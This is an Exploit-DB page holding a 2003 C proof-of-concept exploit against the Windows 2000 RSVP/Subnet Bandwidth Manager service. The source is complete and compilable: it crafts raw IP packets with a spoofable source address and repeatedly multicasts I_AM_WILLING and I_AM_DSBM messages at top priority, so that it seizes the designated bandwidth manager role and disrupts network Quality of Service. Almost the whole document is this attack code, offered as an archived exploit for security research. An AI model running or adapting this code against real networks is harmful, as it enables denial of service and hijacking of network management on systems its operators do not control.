Microsoft Windows Server 2000 - RSVP Server Authority Hijacking

EDB-ID:

81

CVE:


EDB Verified:

Author:

ste jones

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2003-08-15

Vulnerable App: 
// Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking 
//
// A problem has been identified in the RSVP Server for Microsoft Windows 2000 that 
// may allow an attacker to hijack management of the network. This could allow an 
// attacker control of network Quality of Service.
// 
// By ste jones root at networkpenetration.com
//
// Proof of concept code for attack against RSVP / SBM (RFC 2814)
// compile: gcc rsvp.c -Wall -o RSVP_DoS
// Allows spoofing of source IP with -s
// Tested on linux against win2k server
// You will need to be root to launch the attack as we are using raw sockets

/* RSVP
 * Resource ReserVation Protocol Munger
 *
 * multicast IP 224.0.0.17
 * IP protocol number 0x2e for RSVP
 *
 * RSVP Header
 * Version = 4bits
 * flags = 4 bits
 * message type = 8 bits = 67 = I_AM_DSBM
 * RSVP checksum = 16 bits = set to 0's
 * TTL = 8 bits = 1 on multicast
 * Reserved = 8 bits
 * RSVP length = 16 bits
 * + data
 *
 * Data header
 * Length = 16 bits
 * Class = 8 bits
 * type = 8 bits
 * Obj contents
 */

/*
 *Proof of concept - doesnt check if RSVP priority of server assumes lower
 */
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <arpa/inet.h>

void usage(char *progname);
void startattack(void);
unsigned short in_chksum(unsigned short *pts, int nbytes);

struct rsvphead{
	int flags:4;
	int version:4;
	char type:8;
	int checksum:16;
	char ttl:8;
	char reserved:8;
	int length:16;
};

struct rsvpdata{
	char buf[40];
};


struct header{
	struct iphdr ip;
	struct rsvphead rhead;
	struct rsvpdata rdata;
};

struct in_addr spoofed;

int main(int argc, char *argv[])
{

	int c;
	printf("RSVP Munger by Ste Jones from NetworkPenetration\n");
	printf("----------------------------------------------------\n");
	opterr = 0; //stop error messages from command line
	while ((c=getopt(argc, argv, "s:")) != -1){
		switch(c){
			case 's':	if(!inet_aton(optarg, &spoofed)){
						printf("Malformed IP
address: %s\n",optarg);
						exit(1);
					}
					break;

			default:	usage(argv[0]);
					exit(1);
					break;
		}
	}
	for(;;){
	startattack();
	}
	exit(0);
}

void startattack(void)
{
	struct header heada;
	struct sockaddr_in sin;
	int sock;
	int on;
	int sinlen;
	int willing;
	unsigned char *sourceip;
	on = 1;
	willing = 4; //send willing four times then I_AM_DBSM
	printf("\nSending %d I_AM_WILLING packets followed by I_AM_DSBM
packets every 5 seconds\n\n", willing);
	for(;;){

		memset(&heada, '\0', sizeof(heada));
		if(willing) printf("Creating I_AM_WILLING packet\n");
		else printf("Creating I_AM_DSBM packet\n");

		heada.ip.ihl = 5;
		heada.ip.version = 4;
		heada.ip.tos = 0xc0; //same options as set by Microsoft
RSVP
		if(willing) heada.ip.tot_len = htons(56);
		else heada.ip.tot_len = htons(64);
		heada.ip.id = 0x0000; //checksum calculate later
		heada.ip.frag_off = 0;
		heada.ip.ttl = 1; //multicast uses ttl of 1
		heada.ip.protocol = 0x2e; //RSVP protocol number
		heada.ip.check = 0;
		if(spoofed.s_addr){
			heada.ip.saddr = spoofed.s_addr;
		}
		else heada.ip.saddr = 0; //let kernel decide
		heada.ip.daddr = inet_addr("224.0.0.17");

		sourceip = (unsigned char *)&heada.ip.saddr;

		heada.rhead.flags   = 0;
		heada.rhead.version = 1;
		if(willing) heada.rhead.type    = 0x42; //I_AM_WILLING
		else heada.rhead.type    = 0x43; //I_AM_DSBM

		heada.rhead.checksum= 0x0000; //checksum calculated later
		heada.rhead.ttl     = 0x01;
		heada.rhead.reserved= 0x00;
		if(willing) heada.rhead.length = 0x2400;
		else heada.rhead.length  = 0x2c00;

		heada.rdata.buf[0]  = 0x00;//length
		heada.rdata.buf[1]  = 0x08;//length
		heada.rdata.buf[2]  = 0x2a;//0x2a01 = DSBM IP ADDR
		heada.rdata.buf[3]  = 0x01;
		heada.rdata.buf[4]  = sourceip[0];//IP address
		heada.rdata.buf[5]  = sourceip[1];//if not spoofed DSBM IP
ADDR = 0
		heada.rdata.buf[6]  = sourceip[2];//
		heada.rdata.buf[7]  = sourceip[3];//

		heada.rdata.buf[8]  = 0x00;//length
		heada.rdata.buf[9]  = 0x0c;//length
		heada.rdata.buf[10]  = 0xa1;//0a101 = RSVP_HOP_L2, IEEE
canonical addr
		heada.rdata.buf[11]  = 0x01;
		heada.rdata.buf[12]  = 0x00; //mac addr
		heada.rdata.buf[13]  = 0x11; //
		heada.rdata.buf[14]  = 0x22; //
		heada.rdata.buf[15]  = 0x33; //
		heada.rdata.buf[16]  = 0x44; //
		heada.rdata.buf[17]  = 0x55; //
		heada.rdata.buf[18]  = 0x00; //
		heada.rdata.buf[19]  = 0x00; //

		heada.rdata.buf[20]  = 0x00; //length
		heada.rdata.buf[21]  = 0x08; //length
		heada.rdata.buf[22]  = 0x2b; // 0x2b01 = SMB_Priority
		heada.rdata.buf[23]  = 0x01; //
		heada.rdata.buf[24]  = 0x00; //priority
		heada.rdata.buf[25]  = 0x00; //priority
		heada.rdata.buf[26]  = 0x00; //priority
		if(!willing)heada.rdata.buf[27]  = 0xff; //priority 255
		else heada.rdata.buf[27] = 0xff; //priority
		//priority = 255
		//highest possible priority
		//if server has lower priority vulernable to DoS

		if(!willing){
			heada.rdata.buf[28]  = 0x00; //length
			heada.rdata.buf[29]  = 0x08; //length
			heada.rdata.buf[30]  = 0x2c; //0x2c01 = DSBM timer
intervals
			heada.rdata.buf[31]  = 0x01;
			heada.rdata.buf[32]  = 0x00; //retransmit time
			heada.rdata.buf[33]  = 0x00; //
			heada.rdata.buf[34]  = 0x0f; //0x0f?
			heada.rdata.buf[35]  = 0x05; //time 5 seconds
		}

		heada.ip.check = in_chksum((unsigned short *)&heada.ip,
20);

		sin.sin_family = AF_INET;
		sin.sin_port = htons(0);
		sin.sin_addr.s_addr = inet_addr("224.0.0.17");

		if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
			printf("Socket error %s\n",strerror(errno));
			exit(1);
		}

		if((setsockopt(sock,IPPROTO_IP, IP_HDRINCL, &on, sizeof
(on))) < 0){
			printf("Setsockopt error %s\n",strerror(errno));
			exit(1);
		}

		sinlen = sizeof(sin);

		if(willing){
			if(sendto(sock, &heada, 56, 0, (struct sockaddr *)
&sin, sinlen) != 56){
				printf("Sento error\n");
				exit(1);
			}
			printf("Sent I_AM_WILLING packet\n");
		}

		else{
			if(sendto(sock, &heada, 64, 0, (struct sockaddr *)
&sin, sinlen) != 64){
				printf("Sento error\n");
				exit(1);
			}
		printf("Sent I_AM_DBSM packet\n");
		}

		close(sock);
		if(willing) willing--;
		sleep(5);
	}
}

void usage(char *progname)
{
	printf("\n%s\n", progname);
	printf("\t-s <ip address> Spoof source IP address\n");
	printf("\n");

	exit(1);
}

unsigned short in_chksum(unsigned short *pts, int nbytes)
{
        register long sum;
        u_short oddbyte;
        register u_short answer;

        sum = 0;
        while(nbytes > 1){
                sum += *pts++;
                nbytes -=2;
       }

        if(nbytes == 1){
                oddbyte = 0;
                *((u_char *) &oddbyte) = *(u_char *)pts;
                sum += oddbyte;
        }

        sum = (sum >> 16) + (sum &0xffff);
        sum += (sum >>16);
        answer = ~sum;
        return(answer);
}



// milw0rm.com [2003-08-15]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services